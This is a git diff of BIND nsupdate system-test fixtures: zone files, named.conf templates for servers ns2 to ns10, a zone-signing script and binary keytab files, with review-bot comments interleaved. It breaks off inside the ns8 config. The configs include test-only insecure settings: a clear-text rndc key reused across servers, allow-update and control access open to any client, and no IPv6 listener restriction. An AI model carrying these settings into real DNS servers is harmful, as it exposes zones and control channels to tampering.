@@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 0 SOA ns1 . 0 0 0 0 0 +@ 0 NS ns1 +ns1 0 A 10.53.0.1 +; a RRset that exists +exists 0 TXT This RRset exists. +; nxdomain +; A named without a TXT RRset +no-txt 0 A 1.2.3.4 diff --git a/bin/tests/system/nsupdate/ns10/dns.keytab b/bin/tests/system/nsupdate/ns10/dns.keytab Binary files differnew file mode 100644 index 0000000..95eea90 --- /dev/null +++ b/bin/tests/system/nsupdate/ns10/dns.keytab diff --git a/bin/tests/system/nsupdate/ns10/example.com.db.in b/bin/tests/system/nsupdate/ns10/example.com.db.in new file mode 100644 index 0000000..da5cedf --- /dev/null +++ b/bin/tests/system/nsupdate/ns10/example.com.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns10.example.com. hostmaster.example.com. ( + 1 ; serial + 2000 ; refresh (2000 seconds) + 2000 ; retry (2000 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns10 +ns10 A 10.53.0.10 diff --git a/bin/tests/system/nsupdate/ns10/in-addr.db.in b/bin/tests/system/nsupdate/ns10/in-addr.db.in new file mode 100644 index 0000000..da5cedf --- /dev/null +++ b/bin/tests/system/nsupdate/ns10/in-addr.db.in 
@@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns10.example.com. hostmaster.example.com. ( + 1 ; serial + 2000 ; refresh (2000 seconds) + 2000 ; retry (2000 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns10 +ns10 A 10.53.0.10 diff --git a/bin/tests/system/nsupdate/ns10/machine.ccache b/bin/tests/system/nsupdate/ns10/machine.ccache Binary files differnew file mode 100644 index 0000000..ced26bd --- /dev/null +++ b/bin/tests/system/nsupdate/ns10/machine.ccache diff --git a/bin/tests/system/nsupdate/ns10/named.conf.in b/bin/tests/system/nsupdate/ns10/named.conf.in new file mode 100644 index 0000000..001f78d --- /dev/null +++ b/bin/tests/system/nsupdate/ns10/named.conf.in 
@@ -0,0 +1,50 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.10;
+ notify-source 10.53.0.10;
+ transfer-source 10.53.0.10;
+ port @PORT@;
+ pid-file "named.pid";
+ session-keyfile "session.key";
+ listen-on { 10.53.0.10; };
+ recursion no;
+ notify yes;
+ minimal-responses no;
+ @TKEY_CONFIGURATION@
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.10 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "in-addr.arpa" {
+ type primary;
+ file "in-addr.db";
+ update-policy { grant EXAMPLE.COM ms-subdomain . PTR; };
+};
+
+zone "example.com" {
+ type primary;
+ file "example.com.db";
+ update-policy {
+ grant EXAMPLE.COM ms-selfsub . ANY;
+ grant EXAMPLE.COM ms-subdomain _tcp.example.com SRV;
+ };
+};
diff --git a/bin/tests/system/nsupdate/ns2/named.conf.in b/bin/tests/system/nsupdate/ns2/named.conf.in
new file mode 100644
index 0000000..f1a1735
--- /dev/null
+++ b/bin/tests/system/nsupdate/ns2/named.conf.in
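Review bot: The `options` block in ns10/named.conf.in has no `listen-on-v6` statement, whereas the ns1, ns2 and ns3 configs in this commit all set `listen-on-v6 { none; };`. Without it named falls back to its built-in default for IPv6 listeners, which I believe is to listen on every IPv6 interface, so this GSS-TSIG test server may be reachable on `@PORT@` beyond 10.53.0.10; please confirm against the BIND version in use. If that is not intended, add `listen-on-v6 { none; };` after the `listen-on { 10.53.0.10; };` line.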
@@ -0,0 +1,74 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.2 dscp 4;
+ notify-source 10.53.0.2 dscp 5;
+ transfer-source 10.53.0.2 dscp 6;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify yes;
+ serial-query-rate 1; // workaround for KB AA-01213
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+key altkey {
+ algorithm hmac-md5;
+ secret "1234abcd8765";
+};
+
+view alternate {
+ match-clients { key altkey; };
+
+ zone "update.nil" {
+ type secondary;
+ primaries { 10.53.0.1; };
+ file "update.alt.bk";
+ allow-transfer { any; };
+ };
+};
+
+view primary {
+ match-clients { any; };
+
+ zone "example.nil" {
+ type secondary;
+ primaries { 10.53.0.1; };
+ file "example.bk";
+ allow-transfer { any; };
+ };
+
+ zone "update.nil" {
+ type secondary;
+ primaries { 10.53.0.1; };
+ file "update.bk";
+ allow-transfer { any; };
+ };
+
+ zone "sample" {
+ type primary;
+ allow-update { any; };
+ file "sample.db";
+ };
+};
diff --git a/bin/tests/system/nsupdate/ns2/sample.db.in b/bin/tests/system/nsupdate/ns2/sample.db.in
new file mode 100644
index 0000000..848cc86
--- /dev/null
+++ b/bin/tests/system/nsupdate/ns2/sample.db.in
@@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 0 SOA ns2 . 0 0 0 0 0 +@ 0 NS ns2 +ns2 0 A 10.53.0.2 +; +; These prerequistes are reversed, relative to ns1/sample.db.in: +; 'exists' does not exist. +nxdomain 0 TXT This RRset exists. + +; a name with a TXT RRset +no-txt 0 TXT This RRset exists diff --git a/bin/tests/system/nsupdate/ns3/delegation.test.db.in b/bin/tests/system/nsupdate/ns3/delegation.test.db.in new file mode 100644 index 0000000..195c73b --- /dev/null +++ b/bin/tests/system/nsupdate/ns3/delegation.test.db.in @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 10 +delegation.test. IN SOA delegation.test. hostmaster.delegation.test. 1 3600 900 2419200 3600 +delegation.test. IN NS delegation.test. +delegation.test. IN A 10.53.0.3 diff --git a/bin/tests/system/nsupdate/ns3/dnskey.test.db.in b/bin/tests/system/nsupdate/ns3/dnskey.test.db.in new file mode 100644 index 0000000..df503fe --- /dev/null +++ b/bin/tests/system/nsupdate/ns3/dnskey.test.db.in 
@@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 10 +dnskey.test. IN SOA dnskey.test. hostmaster.dnskey.test. 1 3600 900 2419200 3600 +dnskey.test. IN NS dnskey.test. +dnskey.test. IN A 10.53.0.3 diff --git a/bin/tests/system/nsupdate/ns3/example.db.in b/bin/tests/system/nsupdate/ns3/example.db.in new file mode 100644 index 0000000..92c0998 --- /dev/null +++ b/bin/tests/system/nsupdate/ns3/example.db.in @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +example. 10 IN SOA example. hostmaster.example. 1 3600 900 2419200 3600 +example. 10 IN NS example. +example. 10 IN A 10.53.0.3 +example. 10 IN NSEC3PARAM 1 1 0 - diff --git a/bin/tests/system/nsupdate/ns3/multisigner.test.db.in b/bin/tests/system/nsupdate/ns3/multisigner.test.db.in new file mode 100644 index 0000000..7b4d91c --- /dev/null +++ b/bin/tests/system/nsupdate/ns3/multisigner.test.db.in 
@@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +multisigner.test. 10 IN SOA multisigner.test. hostmaster.multisigner.test. 1 3600 900 2419200 3600 +multisigner.test. 10 IN NS multisigner.test. +multisigner.test. 10 IN A 10.53.0.3 diff --git a/bin/tests/system/nsupdate/ns3/named.conf.in b/bin/tests/system/nsupdate/ns3/named.conf.in new file mode 100644 index 0000000..f87048a --- /dev/null +++ b/bin/tests/system/nsupdate/ns3/named.conf.in 
@@ -0,0 +1,73 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS3
+
+options {
+ query-source address 10.53.0.3 dscp 7;
+ notify-source 10.53.0.3 dscp 8;
+ transfer-source 10.53.0.3 dscp 9;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ dnssec-validation yes;
+};
+
+zone "example" {
+ type primary;
+ allow-update { any; };
+ file "example.db";
+};
+
+zone "nsec3param.test" {
+ type primary;
+ allow-update { any; };
+ file "nsec3param.test.db.signed";
+};
+
+zone "dnskey.test" {
+ type primary;
+ allow-update { any; };
+ file "dnskey.test.db.signed";
+};
+
+zone "many.test" {
+ type secondary;
+ primaries { 10.53.0.1; };
+ allow-update-forwarding { any; };
+ file "many.test.bk";
+};
+
+zone "delegation.test" {
+ type primary;
+ allow-update { any; };
+ file "delegation.test.db.signed";
+};
+
+zone "too-big.test" {
+ type primary;
+ allow-update { any; };
+ max-records 3;
+ file "too-big.test.db";
+};
+
+/* Zone for testing CDS and CDNSKEY updates from other provider */
+zone "multisigner.test" {
+ type primary;
+ allow-update { any; };
+ dnssec-policy "default";
+ file "multisigner.test.db";
+};
diff --git a/bin/tests/system/nsupdate/ns3/nsec3param.test.db.in b/bin/tests/system/nsupdate/ns3/nsec3param.test.db.in
new file mode 100644
index 0000000..b26f5bd
--- /dev/null
+++ b/bin/tests/system/nsupdate/ns3/nsec3param.test.db.in
@@ -0,0 +1,15 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 10
+nsec3param.test. IN SOA nsec3param.test. hostmaster.nsec3param.test. 1 3600 900 2419200 3600
+nsec3param.test. IN NS nsec3param.test.
+nsec3param.test. IN A 10.53.0.3
diff --git a/bin/tests/system/nsupdate/ns3/sign.sh b/bin/tests/system/nsupdate/ns3/sign.sh
new file mode 100644
index 0000000..c3db402
--- /dev/null
+++ b/bin/tests/system/nsupdate/ns3/sign.sh
@@ -0,0 +1,51 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=../..
+. $SYSTEMTESTTOP/conf.sh
+
+zone=nsec3param.test.
+infile=nsec3param.test.db.in
+zonefile=nsec3param.test.db
+
+keyname1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone)
+keyname2=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone)
+
+cat $infile $keyname1.key $keyname2.key >$zonefile
+
+$SIGNER -P -3 - -H 1 -o $zone -k $keyname1 $zonefile $keyname2 > /dev/null
+
+zone=dnskey.test.
+infile=dnskey.test.db.in
+zonefile=dnskey.test.db
+
+keyname1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone)
+keyname2=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone)
+
+cat $infile $keyname1.key $keyname2.key >$zonefile
+
+$SIGNER -P -o $zone -k $keyname1 $zonefile $keyname2 > /dev/null
+
+zone=delegation.test.
+infile=delegation.test.db.in
+zonefile=delegation.test.db
+
+keyname1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -3 -f KSK $zone)
+keyname2=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -3 $zone)
+
+cat $infile $keyname1.key $keyname2.key >$zonefile
+
+$SIGNER -A -3 - -P -o $zone -k $keyname1 $zonefile $keyname2 > /dev/null
+
+# Just copy multisigner.db.in because it is signed with dnssec-policy.
+cp multisigner.test.db.in multisigner.test.db
diff --git a/bin/tests/system/nsupdate/ns3/too-big.test.db.in b/bin/tests/system/nsupdate/ns3/too-big.test.db.in
new file mode 100644
index 0000000..45ee9ad
--- /dev/null
+++ b/bin/tests/system/nsupdate/ns3/too-big.test.db.in
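Review bot: ns3/sign.sh gets its error handling only from the `-e` on the `#!/bin/sh -e` line, which is ignored when the script is run as `sh sign.sh`; setup.sh in this commit passes `-e` explicitly, but nothing in the script itself enforces it. Without it a failed `$KEYGEN` leaves `keyname1` empty and the following `cat` and `$SIGNER` lines still run on incomplete input. I would add `set -e` before the first `zone=` assignment. The last comment also names `multisigner.db.in` while the command copies `multisigner.test.db.in`; it should read `# Just copy multisigner.test.db.in because it is signed with dnssec-policy.`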
@@ -0,0 +1,15 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 10
+too-big.test. IN SOA too-big.test. hostmaster.too-big.test. 1 3600 900 2419200 3600
+too-big.test. IN NS too-big.test.
+too-big.test. IN A 10.53.0.3
diff --git a/bin/tests/system/nsupdate/ns5/local.db.in b/bin/tests/system/nsupdate/ns5/local.db.in
new file mode 100644
index 0000000..12a5d8b
--- /dev/null
+++ b/bin/tests/system/nsupdate/ns5/local.db.in
@@ -0,0 +1,25 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$ORIGIN .
+$TTL 300 ; 5 minutes
+local.nil IN SOA ns5.local.nil. hostmaster.local.nil. (
+ 1 ; serial
+ 2000 ; refresh (2000 seconds)
+ 2000 ; retry (2000 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+local.nil. NS ns5.local.nil.
+ns5.local.nil. A 10.53.0.5
+
+$ORIGIN local.nil.
+a A 10.10.10.10
diff --git a/bin/tests/system/nsupdate/ns5/named.args b/bin/tests/system/nsupdate/ns5/named.args
new file mode 100644
index 0000000..a1ebb6f
--- /dev/null
+++ b/bin/tests/system/nsupdate/ns5/named.args
@@ -0,0 +1 @@
+-D nsupdate-ns5 -m record,size,mctx -c named.conf -d 99 -X named.lock -g -U 4 -T maxcachesize=2097152 -T fixedlocal
diff --git a/bin/tests/system/nsupdate/ns5/named.conf.in b/bin/tests/system/nsupdate/ns5/named.conf.in
new file mode 100644
index 0000000..c36777d
--- /dev/null
+++ b/bin/tests/system/nsupdate/ns5/named.conf.in
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.5;
+ notify-source 10.53.0.5;
+ transfer-source 10.53.0.5;
+ port @PORT@;
+ pid-file "named.pid";
+ session-keyfile "session.key";
+ listen-on { 10.53.0.5; };
+ recursion no;
+ notify yes;
+ minimal-responses no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "local.nil" {
+ type primary;
+ file "local.db";
+ update-policy local;
+};
diff --git a/bin/tests/system/nsupdate/ns6/in-addr.db.in b/bin/tests/system/nsupdate/ns6/in-addr.db.in
new file mode 100644
index 0000000..9ac2b61
--- /dev/null
+++ b/bin/tests/system/nsupdate/ns6/in-addr.db.in
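Review bot: In ns5/named.conf.in the `controls` statement uses `allow { any; }`, so the control channel is protected only by `rndc_key`, and that key's secret `1234abcd8765` is committed in clear text and repeated unchanged in the ns6, ns7, ns8 and ns9 named.conf.in files of this commit. That is workable for a fixture bound to 10.53.0.5, but nothing in the file says the key is a throwaway. I would add a comment above the key block such as `/* Test-only key, published in the source tree; never use it on a reachable server. */`. If the test harness connects from the same test network (not visible here), the ACL could also name that source instead of `any`.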
@@ -0,0 +1,21 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA ns5.local.nil. hostmaster.local.nil. (
+ 1 ; serial
+ 2000 ; refresh (2000 seconds)
+ 2000 ; retry (2000 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns5
+ns5 A 10.53.0.5
diff --git a/bin/tests/system/nsupdate/ns6/named.args b/bin/tests/system/nsupdate/ns6/named.args
new file mode 100644
index 0000000..11e5449
--- /dev/null
+++ b/bin/tests/system/nsupdate/ns6/named.args
@@ -0,0 +1 @@
+-D nsupdate-ns6 -m record,size,mctx -c named.conf -d 99 -X named.lock -g -U 4 -T maxcachesize=2097152 -T fixedlocal
diff --git a/bin/tests/system/nsupdate/ns6/named.conf.in b/bin/tests/system/nsupdate/ns6/named.conf.in
new file mode 100644
index 0000000..a2bc409
--- /dev/null
+++ b/bin/tests/system/nsupdate/ns6/named.conf.in
@@ -0,0 +1,40 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.6; + notify-source 10.53.0.6; + transfer-source 10.53.0.6; + port @PORT@; + pid-file "named.pid"; + session-keyfile "session.key"; + listen-on { 10.53.0.6; }; + recursion no; + notify yes; + minimal-responses no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.6 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "in-addr.arpa" { + type primary; + file "in-addr.db"; + update-policy { grant * tcp-self . PTR; }; +}; diff --git a/bin/tests/system/nsupdate/ns7/dns.keytab b/bin/tests/system/nsupdate/ns7/dns.keytab Binary files differnew file mode 100644 index 0000000..08d5ef4 --- /dev/null +++ b/bin/tests/system/nsupdate/ns7/dns.keytab diff --git a/bin/tests/system/nsupdate/ns7/example.com.db.in b/bin/tests/system/nsupdate/ns7/example.com.db.in new file mode 100644 index 0000000..34a0885 --- /dev/null +++ b/bin/tests/system/nsupdate/ns7/example.com.db.in 
@@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns7.example.com. hostmaster.example.com. ( + 1 ; serial + 2000 ; refresh (2000 seconds) + 2000 ; retry (2000 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns7 +ns7 A 10.53.0.7 diff --git a/bin/tests/system/nsupdate/ns7/in-addr.db.in b/bin/tests/system/nsupdate/ns7/in-addr.db.in new file mode 100644 index 0000000..34a0885 --- /dev/null +++ b/bin/tests/system/nsupdate/ns7/in-addr.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns7.example.com. hostmaster.example.com. ( + 1 ; serial + 2000 ; refresh (2000 seconds) + 2000 ; retry (2000 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns7 +ns7 A 10.53.0.7 diff --git a/bin/tests/system/nsupdate/ns7/machine.ccache b/bin/tests/system/nsupdate/ns7/machine.ccache Binary files differnew file mode 100644 index 0000000..7dcd959 --- /dev/null +++ b/bin/tests/system/nsupdate/ns7/machine.ccache diff --git a/bin/tests/system/nsupdate/ns7/named.conf.in b/bin/tests/system/nsupdate/ns7/named.conf.in new file mode 100644 index 0000000..9d28bf5 --- /dev/null 
+++ b/bin/tests/system/nsupdate/ns7/named.conf.in @@ -0,0 +1,50 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.7; + notify-source 10.53.0.7; + transfer-source 10.53.0.7; + port @PORT@; + pid-file "named.pid"; + session-keyfile "session.key"; + listen-on { 10.53.0.7; }; + recursion no; + notify yes; + minimal-responses no; + tkey-gssapi-keytab "dns.keytab"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.7 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "in-addr.arpa" { + type primary; + file "in-addr.db"; + update-policy { grant EXAMPLE.COM krb5-subdomain . PTR; }; +}; + +zone "example.com" { + type primary; + file "example.com.db"; + update-policy { + grant EXAMPLE.COM krb5-self . ANY; + grant EXAMPLE.COM krb5-subdomain _tcp.example.com SRV; + }; +}; diff --git a/bin/tests/system/nsupdate/ns8/dns-other-than-KRB5_KTNAME.keytab b/bin/tests/system/nsupdate/ns8/dns-other-than-KRB5_KTNAME.keytab Binary files differnew file mode 100644 index 0000000..3340049 --- /dev/null +++ b/bin/tests/system/nsupdate/ns8/dns-other-than-KRB5_KTNAME.keytab diff --git a/bin/tests/system/nsupdate/ns8/example.com.db.in b/bin/tests/system/nsupdate/ns8/example.com.db.in new file mode 100644 index 0000000..f83a3eb --- /dev/null +++ b/bin/tests/system/nsupdate/ns8/example.com.db.in 
@@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns8.example.com. hostmaster.example.com. ( + 1 ; serial + 2000 ; refresh (2000 seconds) + 2000 ; retry (2000 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns8 +ns8 A 10.53.0.8 diff --git a/bin/tests/system/nsupdate/ns8/in-addr.db.in b/bin/tests/system/nsupdate/ns8/in-addr.db.in new file mode 100644 index 0000000..f83a3eb --- /dev/null +++ b/bin/tests/system/nsupdate/ns8/in-addr.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns8.example.com. hostmaster.example.com. ( + 1 ; serial + 2000 ; refresh (2000 seconds) + 2000 ; retry (2000 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns8 +ns8 A 10.53.0.8 diff --git a/bin/tests/system/nsupdate/ns8/machine.ccache b/bin/tests/system/nsupdate/ns8/machine.ccache Binary files differnew file mode 100644 index 0000000..6e75aff --- /dev/null +++ b/bin/tests/system/nsupdate/ns8/machine.ccache diff --git a/bin/tests/system/nsupdate/ns8/named.conf.in b/bin/tests/system/nsupdate/ns8/named.conf.in new file mode 100644 index 0000000..ead3cfe --- /dev/null 
+++ b/bin/tests/system/nsupdate/ns8/named.conf.in @@ -0,0 +1,50 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.8; + notify-source 10.53.0.8; + transfer-source 10.53.0.8; + port @PORT@; + pid-file "named.pid"; + session-keyfile "session.key"; + listen-on { 10.53.0.8; }; + recursion no; + notify yes; + minimal-responses no; + tkey-gssapi-keytab "dns-other-than-KRB5_KTNAME.keytab"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.8 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "in-addr.arpa" { + type primary; + file "in-addr.db"; + update-policy { grant EXAMPLE.COM krb5-subdomain . PTR; }; +}; + +zone "example.com" { + type primary; + file "example.com.db"; + update-policy { + grant EXAMPLE.COM krb5-selfsub . ANY; + grant EXAMPLE.COM 